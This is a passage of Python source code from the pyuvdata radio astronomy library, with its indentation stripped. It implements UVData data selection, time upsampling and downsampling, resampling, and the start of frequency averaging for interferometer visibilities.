"Selected frequencies are not evenly spaced. This "
"will make it impossible to write this data out to "
"some file types"
)
elif np.max(freq_ind_separation) > 1:
warnings.warn(
"Selected frequencies are not contiguous. This "
"will make it impossible to write this data out to "
"some file types."
)
freq_inds = sorted(set(freq_inds))
else:
freq_inds = None
if polarizations is not None:
polarizations = uvutils._get_iterable(polarizations)
if np.array(polarizations).ndim > 1:
polarizations = np.array(polarizations).flatten()
if n_selects > 0:
history_update_string += ", polarizations"
else:
history_update_string += "polarizations"
n_selects += 1
pol_inds = np.zeros(0, dtype=np.int64)
for p in polarizations:
if isinstance(p, str):
p_num = uvutils.polstr2num(p, x_orientation=self.x_orientation)
else:
p_num = p
if p_num in self.polarization_array:
pol_inds = np.append(
pol_inds, np.where(self.polarization_array == p_num)[0]
)
else:
raise ValueError(
"Polarization {p} is not present in the "
"polarization_array".format(p=p)
)
if len(pol_inds) > 2:
pol_ind_separation = pol_inds[1:] - pol_inds[:-1]
if np.min(pol_ind_separation) < np.max(pol_ind_separation):
warnings.warn(
"Selected polarization values are not evenly spaced. This "
"will make it impossible to write this data out to "
"some file types"
)
pol_inds = sorted(set(pol_inds))
else:
pol_inds = None
history_update_string += " using pyuvdata."
return blt_inds, freq_inds, pol_inds, history_update_string
def _select_metadata(
self,
blt_inds,
freq_inds,
pol_inds,
history_update_string,
keep_all_metadata=True,
):
"""
Perform select on everything except the data-sized arrays.
Parameters
----------
blt_inds : list of int
list of baseline-time indices to keep. Can be None (to keep everything).
freq_inds : list of int
list of frequency indices to keep. Can be None (to keep everything).
pol_inds : list of int
list of polarization indices to keep. Can be None (to keep everything).
history_update_string : str
string to append to the end of the history.
keep_all_metadata : bool
Option to keep metadata for antennas that are no longer in the dataset.
"""
if blt_inds is not None:
self.Nblts = len(blt_inds)
self.baseline_array = self.baseline_array[blt_inds]
self.Nbls = len(np.unique(self.baseline_array))
self.time_array = self.time_array[blt_inds]
self.integration_time = self.integration_time[blt_inds]
self.lst_array = self.lst_array[blt_inds]
self.uvw_array = self.uvw_array[blt_inds, :]
self.ant_1_array = self.ant_1_array[blt_inds]
self.ant_2_array = self.ant_2_array[blt_inds]
self.Nants_data = self._calc_nants_data()
if self.phase_center_app_ra is not None:
self.phase_center_app_ra = self.phase_center_app_ra[blt_inds]
if self.phase_center_app_dec is not None:
self.phase_center_app_dec = self.phase_center_app_dec[blt_inds]
if self.phase_center_frame_pa is not None:
self.phase_center_frame_pa = self.phase_center_frame_pa[blt_inds]
if self.multi_phase_center:
self.phase_center_id_array = self.phase_center_id_array[blt_inds]
self.Ntimes = len(np.unique(self.time_array))
if not keep_all_metadata:
ants_to_keep = set(np.unique(self.ant_1_array)).union(
np.unique(self.ant_2_array)
)
inds_to_keep = [
self.antenna_numbers.tolist().index(ant) for ant in ants_to_keep
]
self.antenna_names = [self.antenna_names[ind] for ind in inds_to_keep]
self.antenna_numbers = self.antenna_numbers[inds_to_keep]
self.antenna_positions = self.antenna_positions[inds_to_keep, :]
if self.antenna_diameters is not None:
self.antenna_diameters = self.antenna_diameters[inds_to_keep]
self.Nants_telescope = int(len(ants_to_keep))
if freq_inds is not None:
self.Nfreqs = len(freq_inds)
if self.future_array_shapes:
self.freq_array = self.freq_array[freq_inds]
else:
self.freq_array = self.freq_array[:, freq_inds]
if self.flex_spw or self.future_array_shapes:
self.channel_width = self.channel_width[freq_inds]
if self.flex_spw:
self.flex_spw_id_array = self.flex_spw_id_array[freq_inds]
# Use the spw ID array to check and see which SPWs are left
self.spw_array = self.spw_array[
np.isin(self.spw_array, self.flex_spw_id_array)
]
self.Nspws = len(self.spw_array)
if pol_inds is not None:
self.Npols = len(pol_inds)
self.polarization_array = self.polarization_array[pol_inds]
self.history = self.history + history_update_string
def select(
self,
antenna_nums=None,
antenna_names=None,
ant_str=None,
bls=None,
frequencies=None,
freq_chans=None,
times=None,
time_range=None,
lsts=None,
lst_range=None,
polarizations=None,
blt_inds=None,
inplace=True,
keep_all_metadata=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
):
"""
Downselect data to keep on the object along various axes.
Axes that can be selected along include antenna names or numbers,
antenna pairs, frequencies, times and polarizations. Specific
baseline-time indices can also be selected, but this is not commonly
used.
The history attribute on the object will be updated to identify the
operations performed.
Parameters
----------
antenna_nums : array_like of int, optional
The antennas numbers to keep in the object (antenna positions and
names for the removed antennas will be retained unless
`keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided.
antenna_names : array_like of str, optional
The antennas names to keep in the object (antenna positions and
names for the removed antennas will be retained unless
`keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided.
bls : list of tuple, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]) or a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]) specifying baselines
to keep in the object. For length-2 tuples, the ordering of the numbers
within the tuple does not matter. For length-3 tuples, the polarization
string is in the order of the two antennas. If length-3 tuples are
provided, `polarizations` must be None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to keep in the object. Can be 'auto', 'cross', 'all',
or combinations of antenna numbers and polarizations (e.g. '1',
'1_2', '1x_2y'). See tutorial for more examples of valid strings and
the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`antenna_names`, `bls` args or the `polarizations` parameters,
if it is a ValueError will be raised.
frequencies : array_like of float, optional
The frequencies to keep in the object, each value passed here should
exist in the freq_array.
freq_chans : array_like of int, optional
The frequency channel numbers to keep in the object.
times : array_like of float, optional
The times to keep in the object, each value passed here should
exist in the time_array. Cannot be used with `time_range`.
time_range : array_like of float, optional
The time range in Julian Date to keep in the object, must be
length 2. Some of the times in the object should fall between the
first and last elements. Cannot be used with `times`.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
polarizations : array_like of int or str, optional
The polarizations numbers to keep in the object, each value passed
here should exist in the polarization_array. If passing strings, the
canonical polarization strings (e.g. "xx", "rr") are supported and if the
`x_orientation` attribute is set, the physical dipole strings
(e.g. "nn", "ee") are also supported.
blt_inds : array_like of int, optional
The baseline-time indices to keep in the object. This is
not commonly used.
inplace : bool
Option to perform the select directly on self or return a new UVData
object with just the selected data (the default is True, meaning the
select will be done on self).
keep_all_metadata : bool
Option to keep all the metadata associated with antennas, even those
that do do not have data associated with them after the select option.
run_check : bool
Option to check for the existence and proper shapes of parameters
after downselecting data on this object (the default is True,
meaning the check will be run).
check_extra : bool
Option to check optional parameters as well as required ones (the
default is True, meaning the optional parameters will be checked).
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
downselecting data on this object (the default is True, meaning the
acceptable range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
Returns
-------
UVData object or None
None is returned if inplace is True, otherwise a new UVData object
with just the selected data is returned
Raises
------
ValueError
If any of the parameters are set to inappropriate values.
"""
if inplace:
uv_object = self
else:
uv_object = self.copy()
(
blt_inds,
freq_inds,
pol_inds,
history_update_string,
) = uv_object._select_preprocess(
antenna_nums,
antenna_names,
ant_str,
bls,
frequencies,
freq_chans,
times,
time_range,
lsts,
lst_range,
polarizations,
blt_inds,
)
# do select operations on everything except data_array, flag_array
# and nsample_array
uv_object._select_metadata(
blt_inds, freq_inds, pol_inds, history_update_string, keep_all_metadata
)
if self.metadata_only:
if not inplace:
return uv_object
else:
return
if blt_inds is not None:
for param_name, param in zip(
self._data_params, uv_object.data_like_parameters
):
setattr(uv_object, param_name, param[blt_inds])
if freq_inds is not None:
if self.future_array_shapes:
for param_name, param in zip(
self._data_params, uv_object.data_like_parameters
):
setattr(uv_object, param_name, param[:, freq_inds, :])
else:
for param_name, param in zip(
self._data_params, uv_object.data_like_parameters
):
setattr(uv_object, param_name, param[:, :, freq_inds, :])
if pol_inds is not None:
if self.future_array_shapes:
for param_name, param in zip(
self._data_params, uv_object.data_like_parameters
):
setattr(uv_object, param_name, param[:, :, pol_inds])
else:
for param_name, param in zip(
self._data_params, uv_object.data_like_parameters
):
setattr(uv_object, param_name, param[:, :, :, pol_inds])
# check if object is uv_object-consistent
if run_check:
uv_object.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not inplace:
return uv_object
def _harmonize_resample_arrays(
self,
inds_to_keep,
temp_baseline,
temp_time,
temp_int_time,
temp_data,
temp_flag,
temp_nsample,
):
"""
Make a self-consistent object after up/downsampling.
This function is called by both upsample_in_time and downsample_in_time.
See those functions for more information about arguments.
"""
self.baseline_array = self.baseline_array[inds_to_keep]
self.time_array = self.time_array[inds_to_keep]
self.integration_time = self.integration_time[inds_to_keep]
self.baseline_array = np.concatenate((self.baseline_array, temp_baseline))
self.time_array = np.concatenate((self.time_array, temp_time))
self.integration_time = np.concatenate((self.integration_time, temp_int_time))
if not self.metadata_only:
self.data_array = self.data_array[inds_to_keep]
self.flag_array = self.flag_array[inds_to_keep]
self.nsample_array = self.nsample_array[inds_to_keep]
# concatenate temp array with existing arrays
self.data_array = np.concatenate((self.data_array, temp_data), axis=0)
self.flag_array = np.concatenate((self.flag_array, temp_flag), axis=0)
self.nsample_array = np.concatenate(
(self.nsample_array, temp_nsample), axis=0
)
# set antenna arrays from baseline_array
self.ant_1_array, self.ant_2_array = self.baseline_to_antnums(
self.baseline_array
)
# update metadata
self.Nblts = self.baseline_array.shape[0]
self.Ntimes = np.unique(self.time_array).size
self.uvw_array = np.zeros((self.Nblts, 3))
# update app source coords to new times
self._set_app_coords_helper()
# set lst array
self.set_lsts_from_time_array()
# temporarily store the metadata only to calculate UVWs correctly
uv_temp = self.copy(metadata_only=True)
# properly calculate the UVWs self-consistently
uv_temp.set_uvws_from_antenna_positions(allow_phasing=True)
self.uvw_array = uv_temp.uvw_array
return
def upsample_in_time(
self,
max_int_time,
blt_order="time",
minor_order="baseline",
summing_correlator_mode=False,
allow_drift=False,
):
"""
Resample to a shorter integration time.
This method will resample a UVData object such that all data samples have
an integration time less than or equal to the `max_int_time`. The new
samples are copied from the original samples (not interpolated).
Parameters
----------
max_int_time : float
Maximum integration time to upsample to in seconds.
blt_order : str
Major baseline ordering for output object. Default is "time". See
the documentation on the `reorder_blts` method for more info.
minor_order : str
Minor baseline ordering for output object. Default is "baseline".
summing_correlator_mode : bool
Option to split the flux from the original samples into the new
samples rather than duplicating the original samples in all the new
samples (undoing an integration rather than an average) to emulate
undoing the behavior in some correlators (e.g. HERA).
allow_drift : bool
Option to allow resampling of drift mode data. If this is False,
drift mode data will be phased before resampling and then unphased
after resampling. Phasing and unphasing can introduce small errors,
but resampling in drift mode may result in unexpected behavior.
Returns
-------
None
"""
# check that max_int_time is sensible given integration_time
min_integration_time = np.amin(self.integration_time)
sensible_min = 1e-2 * min_integration_time
if max_int_time < sensible_min:
raise ValueError(
"Decreasing the integration time by more than a "
"factor of 100 is not supported. Also note that "
"max_int_time should be in seconds."
)
# figure out where integration_time is longer than max_int_time
inds_to_upsample = np.nonzero(
(self.integration_time > max_int_time)
& (
~np.isclose(
self.integration_time,
max_int_time,
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
)
)
)
if len(inds_to_upsample[0]) == 0:
warnings.warn(
"All values in the integration_time array are already "
"longer than the value specified; doing nothing."
)
return
input_phase_type = self.phase_type
if input_phase_type == "drift":
if allow_drift:
print(
"Data are in drift mode and allow_drift is True, so "
"resampling will be done without phasing."
)
else:
# phase to RA/dec of zenith
print("Data are in drift mode, phasing before resampling.")
phase_time = Time(self.time_array[0], format="jd")
self.phase_to_time(phase_time)
# we want the ceil of this, but we don't want to get the wrong answer
# when the number is very close to an integer but just barely above it.
temp_new_samples = self.integration_time[inds_to_upsample] / max_int_time
mask_close_floor = np.isclose(temp_new_samples, np.floor(temp_new_samples))
temp_new_samples[mask_close_floor] = np.floor(
temp_new_samples[mask_close_floor]
)
n_new_samples = np.asarray(list(map(int, np.ceil(temp_new_samples))))
temp_Nblts = np.sum(n_new_samples)
temp_baseline = np.zeros((temp_Nblts,), dtype=np.int64)
temp_time = np.zeros((temp_Nblts,))
temp_int_time = np.zeros((temp_Nblts,))
if self.metadata_only:
temp_data = None
temp_flag = None
temp_nsample = None
else:
if self.future_array_shapes:
temp_data = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols), dtype=self.data_array.dtype,
)
temp_flag = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols), dtype=self.flag_array.dtype,
)
temp_nsample = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols),
dtype=self.nsample_array.dtype,
)
else:
temp_data = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.data_array.dtype,
)
temp_flag = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.flag_array.dtype,
)
temp_nsample = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.nsample_array.dtype,
)
i0 = 0
for i, ind in enumerate(inds_to_upsample[0]):
i1 = i0 + n_new_samples[i]
temp_baseline[i0:i1] = self.baseline_array[ind]
if not self.metadata_only:
if summing_correlator_mode:
temp_data[i0:i1] = self.data_array[ind] / n_new_samples[i]
else:
temp_data[i0:i1] = self.data_array[ind]
temp_flag[i0:i1] = self.flag_array[ind]
temp_nsample[i0:i1] = self.nsample_array[ind]
# compute the new times of the upsampled array
t0 = self.time_array[ind]
dt = self.integration_time[ind] / n_new_samples[i]
# `offset` will be 0.5 or 1, depending on whether n_new_samples for
# this baseline is even or odd.
offset = 0.5 + 0.5 * (n_new_samples[i] % 2)
n2 = n_new_samples[i] // 2
# Figure out the new center for sample ii taking offset into
# account. Because `t0` is the central time for the original time
# sample, `nt` will range from negative to positive so that
# `temp_time` will result in the central time for the new samples.
# `idx2` tells us how to far to shift and in what direction for each
# new sample.
for ii, idx in enumerate(range(i0, i1)):
idx2 = ii + offset + n2 - n_new_samples[i]
nt = ((t0 * units.day) + (dt * idx2 * units.s)).to(units.day).value
temp_time[idx] = nt
temp_int_time[i0:i1] = dt
i0 = i1
# harmonize temporary arrays with existing ones
inds_to_keep = np.nonzero(self.integration_time <= max_int_time)
self._harmonize_resample_arrays(
inds_to_keep,
temp_baseline,
temp_time,
temp_int_time,
temp_data,
temp_flag,
temp_nsample,
)
if input_phase_type == "drift" and not allow_drift:
print("Unphasing back to drift mode.")
self.unphase_to_drift()
# reorganize along blt axis
self.reorder_blts(order=blt_order, minor_order=minor_order)
# check the resulting object
self.check()
# add to the history
history_update_string = (
" Upsampled data to {:f} second integration time "
"using pyuvdata.".format(max_int_time)
)
self.history = self.history + history_update_string
return
def downsample_in_time(
self,
min_int_time=None,
n_times_to_avg=None,
blt_order="time",
minor_order="baseline",
keep_ragged=True,
summing_correlator_mode=False,
allow_drift=False,
):
"""
Average to a longer integration time.
This method will average a UVData object either by an integer factor
(by setting `n_times_to_avg`) or by a factor that can differ by
baseline-time sample such that after averaging, the samples have an
integration time greater than or equal to the `min_int_time` (up to the
tolerance on the integration_time).
Note that if the integrations for a baseline do not divide evenly by the
`n_times_to_avg` or into the specified `min_int_time`, the final
integrations for that baseline may have integration times less than
`min_int_time` or be composed of fewer input integrations than `n_times_to_avg`.
This behavior can be controlled with the `keep_ragged` argument.
The new samples are averages of the original samples (not interpolations).
Parameters
----------
min_int_time : float
Minimum integration time to average the UVData integration_time to
in seconds.
n_times_to_avg : int
Number of time integrations to average together.
blt_order : str
Major baseline ordering for output object. Default is "time". See the
documentation on the `reorder_blts` method for more details.
minor_order : str
Minor baseline ordering for output object. Default is "baseline".
keep_ragged : bool
When averaging baselines that do not evenly divide into min_int_time,
or that have a number of integrations that do not evenly divide by
n_times_to_avg, keep_ragged controls whether to keep the (averaged)
integrations corresponding to the remaining samples (keep_ragged=True),
or discard them (keep_ragged=False).
summing_correlator_mode : bool
Option to integrate the flux from the original samples rather than
average the flux to emulate the behavior in some correlators (e.g. HERA).
allow_drift : bool
Option to allow averaging of drift mode data. If this is False,
drift mode data will be phased before resampling and then unphased
after resampling. Phasing and unphasing can introduce small errors,
but averaging in drift mode may result in more decoherence.
Returns
-------
None
"""
if min_int_time is None and n_times_to_avg is None:
raise ValueError("Either min_int_time or n_times_to_avg must be set.")
if min_int_time is not None and n_times_to_avg is not None:
raise ValueError("Only one of min_int_time or n_times_to_avg can be set.")
if self.Ntimes == 1:
raise ValueError("Only one time in this object, cannot downsample.")
if min_int_time is not None:
# check that min_int_time is sensible given integration_time
max_integration_time = np.amax(self.integration_time)
sensible_max = 1e2 * max_integration_time
if min_int_time > sensible_max:
raise ValueError(
"Increasing the integration time by more than a "
"factor of 100 is not supported. Also note that "
"min_int_time should be in seconds."
)
# first figure out where integration_time is shorter than min_int_time
inds_to_downsample = np.nonzero(
(self.integration_time < min_int_time)
& (
~np.isclose(
self.integration_time,
min_int_time,
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
)
)
)
if len(inds_to_downsample[0]) == 0:
warnings.warn(
"All values in the integration_time array are already "
"longer than the value specified; doing nothing."
)
return
else:
if not isinstance(n_times_to_avg, (int, np.integer)):
raise ValueError("n_times_to_avg must be an integer.")
# If we're going to do actual work, reorder the baselines to ensure time is
# monotonically increasing.
# Default of reorder_blts is baseline major, time minor, which is what we want.
self.reorder_blts()
if min_int_time is not None:
# now re-compute inds_to_downsample, in case things have changed
inds_to_downsample = np.nonzero(
(self.integration_time < min_int_time)
& ~np.isclose(
self.integration_time,
min_int_time,
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
)
)
bls_to_downsample = np.unique(self.baseline_array[inds_to_downsample])
else:
bls_to_downsample = np.unique(self.baseline_array)
# figure out how many baseline times we'll end up with at the end
n_new_samples = 0
for bl in bls_to_downsample:
bl_inds = np.nonzero(self.baseline_array == bl)[0]
int_times = self.integration_time[bl_inds]
if min_int_time is not None:
running_int_time = 0.0
for itime, int_time in enumerate(int_times):
running_int_time += int_time
over_min_int_time = running_int_time > min_int_time or np.isclose(
running_int_time,
min_int_time,
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
)
last_sample = itime == len(bl_inds) - 1
# We sum up all the samples found so far if we're over the
# target minimum time, or we've hit the end of the time
# samples for this baseline.
if over_min_int_time or last_sample:
if last_sample and not (over_min_int_time or keep_ragged):
# don't do anything -- implicitly drop these integrations
continue
n_new_samples += 1
running_int_time = 0.0
else:
n_bl_times = self.time_array[bl_inds].size
nsample_temp = np.sum(n_bl_times / n_times_to_avg)
if keep_ragged and not np.isclose(nsample_temp, np.floor(nsample_temp)):
n_new_samples += np.ceil(nsample_temp).astype(int)
else:
n_new_samples += np.floor(nsample_temp).astype(int)
# figure out if there are any time gaps in the data
# meaning that the time differences are larger than the integration times
# time_array is in JD, need to convert to seconds for the diff
dtime = np.ediff1d(self.time_array[bl_inds]) * 24 * 3600
int_times = int_times
if len(np.unique(int_times)) == 1:
# this baseline has all the same integration times
if len(np.unique(dtime)) > 1 and not np.isclose(
np.max(dtime),
np.min(dtime),
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
):
warnings.warn(
"There is a gap in the times of baseline {bl}. "
"The output may include averages across long "
"time gaps.".format(bl=self.baseline_to_antnums(bl))
)
elif not np.isclose(
dtime[0],
int_times[0],
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
):
warnings.warn(
"The time difference between integrations is "
"not the same as the integration time for "
"baseline {bl}. The output may average across "
"longer time intervals than "
"expected".format(bl=self.baseline_to_antnums(bl))
)
else:
# varying integration times for this baseline, need to be more careful
expected_dtimes = (int_times[:-1] + int_times[1:]) / 2
wh_diff = np.nonzero(~np.isclose(dtime, expected_dtimes))
if wh_diff[0].size > 1:
warnings.warn(
"The time difference between integrations is "
"different than the expected given the "
"integration times for baseline {bl}. The "
"output may include averages across long time "
"gaps.".format(bl=self.baseline_to_antnums(bl))
)
temp_Nblts = n_new_samples
input_phase_type = self.phase_type
if input_phase_type == "drift":
if allow_drift:
print(
"Data are in drift mode and allow_drift is True, so "
"resampling will be done without phasing."
)
else:
# phase to RA/dec of zenith
print("Data are in drift mode, phasing before resampling.")
phase_time = Time(self.time_array[0], format="jd")
self.phase_to_time(phase_time)
# make temporary arrays
temp_baseline = np.zeros((temp_Nblts,), dtype=np.int64)
temp_time = np.zeros((temp_Nblts,))
temp_int_time = np.zeros((temp_Nblts,))
if self.metadata_only:
temp_data = None
temp_flag = None
temp_nsample = None
else:
if self.future_array_shapes:
temp_data = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols), dtype=self.data_array.dtype,
)
temp_flag = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols), dtype=self.flag_array.dtype,
)
temp_nsample = np.zeros(
(temp_Nblts, self.Nfreqs, self.Npols),
dtype=self.nsample_array.dtype,
)
else:
temp_data = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.data_array.dtype,
)
temp_flag = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.flag_array.dtype,
)
temp_nsample = np.zeros(
(temp_Nblts, 1, self.Nfreqs, self.Npols),
dtype=self.nsample_array.dtype,
)
temp_idx = 0
for bl in bls_to_downsample:
bl_inds = np.nonzero(self.baseline_array == bl)[0]
running_int_time = 0.0
summing_idx = 0
n_sum = 0
for itime, int_time in enumerate(self.integration_time[bl_inds]):
running_int_time += int_time
n_sum += 1
if min_int_time is not None:
over_min_int_time = running_int_time > min_int_time or np.isclose(
running_int_time,
min_int_time,
rtol=self._integration_time.tols[0],
atol=self._integration_time.tols[1],
)
else:
over_min_int_time = n_sum >= n_times_to_avg
last_sample = itime == len(bl_inds) - 1
# We sum up all the samples found so far if we're over the
# target minimum time, or we've hit the end of the time
# samples for this baseline.
if over_min_int_time or last_sample:
if last_sample and not (over_min_int_time or keep_ragged):
# don't do anything -- implicitly drop these integrations
continue
# sum together that number of samples
temp_baseline[temp_idx] = bl
# this might be wrong if some of the constituent times are
# *totally* flagged
averaging_idx = bl_inds[summing_idx : summing_idx + n_sum]
# take potential non-uniformity of integration_time into account
temp_time[temp_idx] = np.sum(
self.time_array[averaging_idx]
* self.integration_time[averaging_idx]
) / np.sum(self.integration_time[averaging_idx])
temp_int_time[temp_idx] = running_int_time
if not self.metadata_only:
# if all inputs are flagged, the flag array should be True,
# otherwise it should be False.
# The sum below will be zero if it's all flagged and
# greater than zero otherwise
# Then we use a test against 0 to turn it into a Boolean
temp_flag[temp_idx] = (
np.sum(~self.flag_array[averaging_idx], axis=0) == 0
)
mask = self.flag_array[averaging_idx]
# need to update mask if a downsampled visibility will
# be flagged so that we don't set it to zero
if (temp_flag[temp_idx]).any():
if self.future_array_shapes:
ax1_inds, ax2_inds = np.nonzero(temp_flag[temp_idx])
mask[:, ax1_inds, ax2_inds] = False
else:
ax1_inds, ax2_inds, ax3_inds = np.nonzero(
temp_flag[temp_idx]
)
mask[:, ax1_inds, ax2_inds, ax3_inds] = False
masked_data = np.ma.masked_array(
self.data_array[averaging_idx], mask=mask
)
# nsample array is the fraction of data that we actually kept,
# relative to the amount that went into the sum or average
nsample_dtype = self.nsample_array.dtype.type
# promote nsample dtype if half-precision
if nsample_dtype is np.float16:
masked_nsample_dtype = np.float32
else:
masked_nsample_dtype = nsample_dtype
masked_nsample = np.ma.masked_array(
self.nsample_array[averaging_idx],
mask=mask,
dtype=masked_nsample_dtype,
)
if self.future_array_shapes:
int_time_arr = self.integration_time[
averaging_idx, np.newaxis, np.newaxis
]
else:
int_time_arr = self.integration_time[
averaging_idx, np.newaxis, np.newaxis, np.newaxis
]
masked_int_time = np.ma.masked_array(
np.ones_like(
self.data_array[averaging_idx],
dtype=self.integration_time.dtype,
)
* int_time_arr,
mask=mask,
)
if summing_correlator_mode:
temp_data[temp_idx] = np.sum(masked_data, axis=0)
else:
# take potential non-uniformity of integration_time
# and nsamples into account
weights = masked_nsample * masked_int_time
weighted_data = masked_data * weights
temp_data[temp_idx] = np.sum(
weighted_data, axis=0
) / np.sum(weights, axis=0)
# output of masked array calculation should be coerced
# to the datatype of temp_nsample (which has the same
# precision as the original nsample_array)
temp_nsample[temp_idx] = np.sum(
masked_nsample * masked_int_time, axis=0
) / np.sum(self.integration_time[averaging_idx])
# increment counters and reset values
temp_idx += 1
summing_idx += n_sum
running_int_time = 0.0
n_sum = 0
# make sure we've populated the right number of baseline-times
assert temp_idx == temp_Nblts, (
"Wrong number of baselines. Got {:d}, expected {:d}. This is a bug, "
"please make an issue at https://github.com/RadioAstronomySoftwareGroup/"
"pyuvdata/issues".format(temp_idx, temp_Nblts)
)
# harmonize temporary arrays with existing ones
if min_int_time is not None:
bls_not_downsampled = set(self.baseline_array) - set(bls_to_downsample)
inds_to_keep = []
for bl in bls_not_downsampled:
inds_to_keep += np.nonzero(self.baseline_array == bl)[0].tolist()
inds_to_keep = np.array(inds_to_keep, dtype=np.int64)
else:
inds_to_keep = np.array([], dtype=bool)
self._harmonize_resample_arrays(
inds_to_keep,
temp_baseline,
temp_time,
temp_int_time,
temp_data,
temp_flag,
temp_nsample,
)
if input_phase_type == "drift" and not allow_drift:
print("Unphasing back to drift mode.")
self.unphase_to_drift()
# reorganize along blt axis
self.reorder_blts(order=blt_order, minor_order=minor_order)
# check the resulting object
self.check()
# add to the history
if min_int_time is not None:
history_update_string = (
" Downsampled data to {:f} second integration "
"time using pyuvdata.".format(min_int_time)
)
else:
history_update_string = (
" Downsampled data by a factor of {} in "
"time using pyuvdata.".format(n_times_to_avg)
)
self.history = self.history + history_update_string
return
def resample_in_time(
self,
target_time,
only_downsample=False,
only_upsample=False,
blt_order="time",
minor_order="baseline",
keep_ragged=True,
summing_correlator_mode=False,
allow_drift=False,
):
"""
Intelligently upsample or downsample a UVData object to the target time.
Parameters
----------
target_time : float
The target integration time to resample to, in seconds.
only_downsample : bool
Option to only call bda_downsample.
only_upsample : bool
Option to only call bda_upsample.
blt_order : str
Major baseline ordering for output object. Default is "time". See the
documentation on the `reorder_blts` method for more details.
minor_order : str
Minor baseline ordering for output object. Default is "baseline".
keep_ragged : bool
When averaging baselines that do not evenly divide into min_int_time,
keep_ragged controls whether to keep the (summed) integrations
corresponding to the remaining samples (keep_ragged=True), or
discard them (keep_ragged=False). Note this option only applies to the
`bda_downsample` method.
summing_correlator_mode : bool
Option to integrate or split the flux from the original samples
rather than average or duplicate the flux from the original samples
to emulate the behavior in some correlators (e.g. HERA).
allow_drift : bool
Option to allow resampling of drift mode data. If this is False,
drift mode data will be phased before resampling and then unphased
after resampling. Phasing and unphasing can introduce small errors,
but resampling in drift mode may result in unexpected behavior.
Returns
-------
None
"""
# figure out integration times relative to target time
min_int_time = np.amin(self.integration_time)
max_int_time = np.amax(self.integration_time)
if int(np.floor(target_time / min_int_time)) >= 2 and not only_upsample:
downsample = True
else:
downsample = False
if int(np.floor(max_int_time / target_time)) >= 2 and not only_downsample:
upsample = True
else:
upsample = False
if not downsample and not upsample:
warnings.warn(
"No resampling will be done because target time is not "
"a factor of 2 or more off from integration_time. To "
"force resampling set only_upsample or only_downsample "
"keywords or call upsample_in_time or downsample_in_time."
)
return
if downsample:
self.downsample_in_time(
target_time,
blt_order=blt_order,
minor_order=minor_order,
keep_ragged=keep_ragged,
summing_correlator_mode=summing_correlator_mode,
allow_drift=allow_drift,
)
if upsample:
self.upsample_in_time(
target_time,
blt_order=blt_order,
minor_order=minor_order,
summing_correlator_mode=summing_correlator_mode,
allow_drift=allow_drift,
)
return
def frequency_average(
self, n_chan_to_avg, summing_correlator_mode=False, propagate_flags=False
):
"""
Average in frequency.
Does a simple average over an integer number of input channels, leaving
flagged samples out of the average.
In the future, this method will support non-equally spaced channels
and varying channel widths. It will also support setting the frequency
to the true mean of the averaged non-flagged frequencies rather than
the simple mean of the input channel frequencies. For now it does not.
Parameters
----------
n_chan_to_avg : int
Number of channels to average together. If Nfreqs does not divide
evenly by this number, the frequencies at the end of the freq_array
will be dropped to make it evenly divisable. To control which
frequencies are removed, use select before calling this method.
summing_correlator_mode : bool
Option to integrate or split the flux from the original samples
rather than average or duplicate the flux from the original samples
to emulate the behavior in some correlators (e.g. HERA).
propagate_flags: bool
Option to flag an averaged entry even if some of its contributors
are not flagged. The averaged result will still leave the flagged
samples out of the average, except when all contributors are
flagged.
"""
if self.flex_spw:
raise NotImplementedError(
"Frequency averaging not (yet) available for flexible spectral windows"
)
self._check_freq_spacing()
n_final_chan = int(np.floor(self.Nfreqs / n_chan_to_avg))
nfreq_mod_navg = self.Nfreqs % n_chan_to_avg
if nfreq_mod_navg != 0:
# not an even number of final channels
warnings.warn(
"Nfreqs does not divide by `n_chan_to_avg` evenly. "
"The final {} frequencies will be excluded, to "
"control which frequencies to exclude, use a "
"select to control.".format(nfreq_mod_navg)
)
chan_to_keep = np.arange(n_final_chan * n_chan_to_avg)
self.select(freq_chans=chan_to_keep)
if self.future_array_shapes:
self.freq_array = self.freq_array.reshape(
(n_final_chan, n_chan_to_avg)
).mean(axis=1)
self.channel_width = self.channel_width.reshape(
(n_final_chan, n_chan_to_avg)
).sum(axis=1)
else:
self.freq_array = self.freq_array.reshape(
(1, n_final_chan, n_chan_to_avg)
).mean(axis=2)
